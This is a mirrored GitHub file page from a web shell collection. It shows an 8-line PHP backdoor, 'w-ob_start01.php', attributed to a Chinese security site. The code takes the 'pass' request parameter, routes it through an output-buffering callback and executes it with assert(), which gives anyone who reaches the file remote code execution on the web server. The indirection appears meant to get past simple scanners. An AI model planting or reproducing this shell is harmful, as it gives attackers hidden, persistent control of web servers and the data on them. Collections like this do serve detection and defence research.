1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/caidao-shell/w-ob_start01.php
tennc e046b28382 add w-ob_start01.php
from : wooyun.org
author : isno
2015-10-29 20:28:44 +08:00

8 lines
144 B
PHP

<?php
$evalstr="";
ob_start(function ($c,$d){global $evalstr;$evalstr=$c;});
echo $_REQUEST['pass'];
ob_end_flush();
assert($evalstr);
?>